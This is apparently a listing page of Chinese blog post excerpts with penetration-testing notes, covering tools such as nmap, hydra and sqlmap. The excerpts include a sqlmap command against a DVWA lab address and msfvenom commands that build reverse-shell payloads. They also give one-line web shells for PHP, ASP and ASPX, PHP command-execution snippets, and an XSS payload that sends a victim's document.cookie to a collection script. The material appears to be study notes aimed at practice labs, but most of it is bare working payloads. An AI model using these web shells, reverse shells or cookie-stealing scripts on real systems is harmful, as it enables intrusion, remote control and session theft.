摘要： https://www.maltego.com/ce-registration/?utm_source=maltego-suite&utm_medium=software 阅读全文

摘要： Installed softwarenmap,dnsenum,dnsreconcurl https://news.baidu.com |grep baidu.comwhoishydra/xhydrasudo apt-get install -y johnburpsuitesqlmaphashid, 阅读全文

摘要： sqlmap -v 6 -u "http://192.168.2.105:9079/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=iilgd85al5o2rcen81dj 阅读全文

摘要： rc.d rc.local etc/profile user profile crontab windows日志。日志文件。 os日志，app日志 命令行历史 阅读全文

摘要： Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf msfvenom -p linux/x64 阅读全文

摘要： dsniff: 一个密码侦测工具，他能够自动分析端口上收到的某些协议的数据包，并获取相应的密码。dnisff支持的协议有FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS- 阅读全文

摘要： 1，防火墙 https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior https://blog.csdn.n 阅读全文

摘要： 有六个函数，如 ucmd.php::::::::::::::<?php$cmd = "whoami";exec($cmd,$array);print_r($array);?> usystem.php::::::::::::::<?php$cmd = "id";$result = system($cm 阅读全文

摘要： 1，php文件中 <?php @eval($_POST[command]);?> 2，asp<%execute(request("1"))%> 3，aspx <%@ Page Language="Jscript"%> 4，java <% new javax.script.ScriptEngineMa 阅读全文

摘要： 1，发给攻击目标 <script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script> <script>document.location 阅读全文